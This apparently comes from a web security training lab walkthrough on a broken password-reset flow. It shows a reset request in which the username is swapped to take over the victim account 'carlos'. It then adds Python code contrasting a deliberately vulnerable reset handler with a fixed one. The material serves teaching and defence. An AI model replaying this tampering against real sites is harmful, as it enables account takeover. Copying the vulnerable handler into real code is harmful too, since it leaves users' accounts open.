Password Reset Broken Logic
Lab
Password reset broken logic · Apprentice
Solution
Given
This lab's password reset functionality is vulnerable. To solve the lab, reset Carlos's password then log in and access his "My account" page.
Your credentials: wiener:peter
Victim's username: carlos
Analyzing the task
The password reset function on the site is vulnerable. We need to reset carlos's password and log into his account.
Recon
Let's see how the password change function works. We reset the password for user wiener. An email arrives with a link:
https://0a95002d04f7b35180b3a379004c0024.web-security-academy.net/forgot-password?temp-forgot-password-token=0umvuzkyx1mfnas8tb890vwj1rjzk1ji
We follow it and land on the password change page. We enter a new password, repeat it, and the following request goes out:
POST /forgot-password?temp-forgot-password-token=0umvuzkyx1mfnas8tb890vwj1rjzk1ji
Body:
temp-forgot-password-token=0umvuzkyx1mfnas8tb890vwj1rjzk1ji&username=wiener&new-password-1=peter&new-password-2=peter
What if we keep this token but change username, new-password-1, new-password-2?
The request body will look like:
temp-forgot-password-token=0umvuzkyx1mfnas8tb890vwj1rjzk1ji&username=carlos&new-password-1=peter&new-password-2=peter
We send it and the server reports success: the password is changed. We log in as carlos / peter.
Lab solved.
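The logic flaw behind this lab, as an added illustration that is not the lab's code or part of the original write-up: the first handler checks only that the token exists and then trusts the `username` field from the body, which is exactly what the modified request above exploits; the second handler derives the account from the token, expires it, makes it single-use and refuses a body whose username disagrees with the token's owner. The function names, the in-memory stores and the sample accounts are constructed for the example.

```python
# Added illustration (not the lab's code): an in-memory password-reset flow
# showing the broken logic from the write-up next to a fixed version.
import secrets
import time
from dataclasses import dataclass

TOKEN_TTL = 600  # seconds a reset token stays valid in the fixed version


@dataclass
class ResetToken:
    username: str      # the account the token was issued for
    expires_at: float
    used: bool = False


users = {"wiener": "peter", "carlos": "hunter2"}   # constructed sample accounts
tokens: dict[str, ResetToken] = {}


def issue_token(username: str) -> str:
    """Mail-link step: create an unguessable token bound to one account."""
    token = secrets.token_urlsafe(24)
    tokens[token] = ResetToken(username, time.time() + TOKEN_TTL)
    return token


def reset_vulnerable(body: dict) -> bool:
    """Broken logic: the token only has to exist; the account comes from the body."""
    if body["temp-forgot-password-token"] not in tokens:
        return False
    if body["new-password-1"] != body["new-password-2"]:
        return False
    users[body["username"]] = body["new-password-1"]   # caller picks the account
    return True


def reset_fixed(body: dict) -> bool:
    """Fixed: the account is the token's owner, never the body's username."""
    rec = tokens.get(body["temp-forgot-password-token"])
    if rec is None or rec.used or time.time() > rec.expires_at:
        return False
    if body["new-password-1"] != body["new-password-2"]:
        return False
    # A username that disagrees with the token's owner is a tampering signal:
    # refuse the request (and log it) rather than silently correcting it.
    if body.get("username", rec.username) != rec.username:
        return False
    users[rec.username] = body["new-password-1"]
    rec.used = True   # single use: a replayed token is refused
    return True
```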